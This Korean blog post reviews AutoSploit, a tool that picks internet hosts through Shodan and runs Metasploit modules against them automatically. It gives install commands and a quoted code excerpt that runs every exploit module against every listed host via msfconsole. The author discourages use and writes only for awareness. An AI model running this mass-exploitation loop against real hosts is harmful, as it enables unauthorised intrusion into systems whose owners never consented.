오늘은 이번주에 나름 핫했던.. AutoSploit입니다.
What is AutoSploit?
AutoSploit은 원격 호스트에 대한 자동 서칭, Exploit 툴, 스크립트 정도로 생각하시면 좋을 것 같습니다. 파이썬 기반의 코드이며 Shodan을 이용해서 임의의 대상을 선정하고, Metasploit 모듈로 Exploiting 합니다.자동을 대상을 선정하고, 공격하고, 권한을 획득할 수 있다는 점에서 조금 위험한 툴로 보입니다만.. 이미 350명이 넘는 사람이 fork 중이네요. (물론 저도..)
File tree
.
├── Docker
│ ├── Dockerfile
│ ├── README.md
│ └── database.yml
├── LICENSE
├── README.md
├── autosploit.py // Main code
├── modules.txt // Msf module list
└── requirements.txt // 추가 요청한거
How to install?
저장소에서 다운로드합니다.#> git clone https://github.com/NullArray/AutoSploit
#> cd AutoSploit
필요한 라이브러리 설치가 필요합니다.shodan과 blessings 입니다.
#> pip install shodan
#> pip install blessings
pull request를 하나 던져놓긴했는데.. 혹시라도 된다면
pip install -r requirements.txt로 되겠지요.
Metasploit 어떻게 연결했을까?
처음에 툴 내용을 대충보았을땐 Metasploit과 직접 연동되는걸까 라는 생각에 설레였습니다.쓸만한 데이터가 있을까 코드를 보았는데요.. 단순하게 msfonsole command line으로 값을 넘기는 형태입니다.
elif choice == 'a':
with open( "hosts.txt", "rb" ) as host_list:
for rhosts in host_list:
for exploit in all_modules:
template = "sudo msfconsole -x 'workspace -a %s; setg LHOST %s; setg LPORT %s; setg VERBOSE true; setg THREADS 100; set RHOSTS %s; %s'" % (workspace, local_host, local_port, rhosts, exploit)
os.system(template)Conclusion
이런 종류의 프로젝트나 툴들은 많이 있었을겁니다. 다만 kitploit이나 thehackernews등 매체를 통해서 수면위로 올라온 이상 이를 사용하는 사람들도 분명히 늘어날 것이라 생각됩니다.윤리적이나 개인의 기술적 발전이나.. 사용하는 것 자체는 추천드리진 않습니다. 그저 이런게 있구나... 하고 알아가시면 좋을 것 같단 생각에 포스팅합니다.
(어차피 침투과정 연습하시는거라도 직접하는게 더 정확하고, 결과도 좋을겁니다)
 |
HAHWULSecurity engineer, Gopher and H4cker!
 |
[Kitploit article]
ReplyDeletehttps://www.kitploit.com/2018/02/autosploit-automated-mass-exploiter.html?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+PentestTools+%28PenTest+Tools%29